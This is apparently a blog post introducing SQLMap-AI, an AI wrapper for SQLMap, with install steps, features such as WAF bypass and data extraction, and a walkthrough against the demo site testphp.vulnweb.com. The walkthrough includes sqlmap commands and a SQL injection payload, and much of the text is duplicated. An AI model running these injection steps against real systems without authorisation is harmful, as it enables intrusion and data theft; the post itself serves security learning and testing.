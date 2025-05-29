SQLMap is a powerful open-source tool for finding and taking advantage of SQL injection vulnerabilities in web applications. If you've been learning about ethical hacking, you've probably heard of it. But what if we could make SQLMap smarter so smart that it could think like a human penetration tester? That's what SQLMap-AI does. It's an AI-powered wrapper around SQLMap that makes testing for SQL injection easier, smarter, and faster. In this blog post, I'll explain what SQLMap-AI is, how it works, and how you can use it to make your vulnerability assessments much better. Prefer watching instead of reading? Here’s a quick video guide Prefer watching instead of reading? Here’s a quick video guide Prefer watching instead of reading? Here’s a quick video guide Prefer watching instead of reading? Here’s a quick video guide https://youtu.be/MZ8YZJL8tvs?embedable=true https://youtu.be/MZ8YZJL8tvs?embedable=true What is SQLMap-AI? SQLMap-AI is an extra layer on top of SQLMap that adds AI to help with decision making. It automates the process of running SQL injection tests, looking at the results, and suggesting what to do next, just like a real penetration tester would.In simple terms, it's like giving SQLMap a brain that knows what to do at each step. You run the tool, and it changes its strategy based on how the target reacts. This is what makes SQLMap-AI so useful AI-assisted SQL injection testing: It uses the Groq API to read results and help make choices\nStep-by-step adaptive testing: The scan changes based on the type of database and the results.\nBypassing WAFs: Smartly finds and avoids web application firewalls (WAFs)\nDBMS-specific strategies: It uses different methods depending on whether it's MySQL, MSSQL, Oracle, or PostgreSQL.\nUser-friendly reporting: The output is easy to read so that you can better understand the scan results. AI-assisted SQL injection testing: It uses the Groq API to read results and help make choices AI-assisted SQL injection testing: Step-by-step adaptive testing: The scan changes based on the type of database and the results. Step-by-step adaptive testing Bypassing WAFs: Smartly finds and avoids web application firewalls (WAFs) Bypassing WAFs DBMS-specific strategies: It uses different methods depending on whether it's MySQL, MSSQL, Oracle, or PostgreSQL. DBMS-specific strategies User-friendly reporting: The output is easy to read so that you can better understand the scan results. User-friendly reporting How to Get Started You need the following to run SQLMap-AI: Python 3.7 or higher\nSQLMap (included via Git)\nThe Python libraries that are needed (listed in requirements.txt)\nAn API key from Groq for AI features (you can get it at https://console.groq.com ) Python 3.7 or higher SQLMap (included via Git) The Python libraries that are needed (listed in requirements.txt) An API key from Groq for AI features (you can get it at https://console.groq.com ) Steps to Install Copy the repository git clone https://github.com/atiilla/sqlmap-ai.git\ncd sqlmap-ai git clone https://github.com/atiilla/sqlmap-ai.git\ncd sqlmap-ai Set up the dependencies pip install -r requirements.txt pip install -r requirements.txt Add SQLMap git clone https://github.com/sqlmapproject/sqlmap.git git clone https://github.com/sqlmapproject/sqlmap.git Make a file called .env with Groq API key GROQ_API_KEY=your_groq_api_key GROQ_API_KEY=your_groq_api_key How to Use It Normal Mode Normal Mode Use the following to run a basic scan: python run.py python run.py Adaptive Testing Adaptive Testing This is where the real power comes in: python run.py --adaptive python run.py --adaptive It takes a number of smart steps: Initial Assessment: This step checks to see if the target is weak\nFind the DBMS: This tells you if it's MySQL, Oracle, or something else\nDBMS-Specific Tactics: Different payloads for different types of DB\nWAF Bypass: If a firewall is found, it picks the right tamper scripts\nData Extraction: This tool pulls out sensitive information like databases, tables, and more\nExtended Testing: This includes headers, cookies, and parameters in POST requests. Initial Assessment: This step checks to see if the target is weak Initial Assessment Find the DBMS: This tells you if it's MySQL, Oracle, or something else Find the DBMS DBMS-Specific Tactics: Different payloads for different types of DB DBMS-Specific Tactics WAF Bypass: If a firewall is found, it picks the right tamper scripts WAF Bypass Data Extraction: This tool pulls out sensitive information like databases, tables, and more Data Extraction Extended Testing: This includes headers, cookies, and parameters in POST requests. Extended Testing A Real-Life Example Let's say we're testing http://testphp.vulnweb.com/listproducts.php?cat=12 In adaptive mode, the tool does the following: Initial Evaluation Initial Evaluation sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=12 --batch --dbs --threads=5 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=12 --batch --dbs --threads=5 Output: The vulnerable parameter is "cat."\nThe DBMS found is MySQL.\nThe databases found are acuart and information_schema. The vulnerable parameter is "cat." The DBMS found is MySQL. The databases found are acuart and information_schema. Optimize for your DBMS Optimize for your DBMS sqlmap -u ... --dbms=mysql --tables --threads=5 sqlmap -u ... --dbms=mysql --tables --threads=5 High Risk Testing High Risk Testing sqlmap -u ... --risk=3 --level=5 sqlmap -u ... --risk=3 --level=5 List of High-Risk Tables List of High-Risk Tables sqlmap -u ... --tables --risk=3 --level=5 sqlmap -u ... --tables --risk=3 --level=5 Payload Examples Used: cat=(SELECT (CASE WHEN (3918=3918) THEN 12 ELSE (SELECT 6516 UNION SELECT 1824) END)) cat=(SELECT (CASE WHEN (3918=3918) THEN 12 ELSE (SELECT 6516 UNION SELECT 1824) END)) Output DBMS: MySQL >= 8.0.0\nOS: Linux Ubuntu\nWeb Server: PHP 5.6.40\nNginx 1.19.0\nTables for artists, products, users, a guestbook, and more. DBMS: MySQL >= 8.0.0 OS: Linux Ubuntu Web Server: PHP 5.6.40 Nginx 1.19.0 Tables for artists, products, users, a guestbook, and more. Reminder about ethics Ask for permission before scanning any website. SQLMap-AI is only meant for legal and educational penetration testing. It is against the law to run it on targets that you don't have permission to. Use Cases for Students and Professionals Cybersecurity students: Learn how to do SQL injection without having to write complicated commands.\nBug bounty hunters: Quickly figure out how to attack targets using flexible strategies.\nRed teamers: Automate some of the work that goes into reconnaissance and injection testing.\nTeachers: Show how to do SQL injection step by step with AI explanations. Cybersecurity students: Learn how to do SQL injection without having to write complicated commands. Cybersecurity students Bug bounty hunters: Quickly figure out how to attack targets using flexible strategies. Bug bounty hunters Red teamers: Automate some of the work that goes into reconnaissance and injection testing. Red teamers Teachers: Show how to do SQL injection step by step with AI explanations. Teachers Want to help? Anyone can help with this open-source project. Some things that could be better are: more support for databases (like SQLite)\na better reporting UI\nmore advanced WAF detection methods\nmore real-world examples in the documentation. more support for databases (like SQLite) a better reporting UI more advanced WAF detection methods more real-world examples in the documentation. To help, do these things: # Fork the repo\ngit clone https://github.com/yourusername/sqlmap-ai.git\n\n# Make changes\ngit checkout -b feature/your-feature-name\n\n# Commit and push\ngit commit -m "Add feature"\ngit push origin feature/your-feature-name # Fork the repo\ngit clone https://github.com/yourusername/sqlmap-ai.git\n\n# Make changes\ngit checkout -b feature/your-feature-name\n\n# Commit and push\ngit commit -m "Add feature"\ngit push origin feature/your-feature-name After that, make a pull request. Last Thoughts SQLMap-AI is a great new version of the old SQLMap tool. It uses AI to make decisions, works with different databases, and gives you a smart assistant to help you test for vulnerabilities. This tool can help you learn more about web security, cybersecurity, or penetration testing with less work. Give it a try, but be responsible.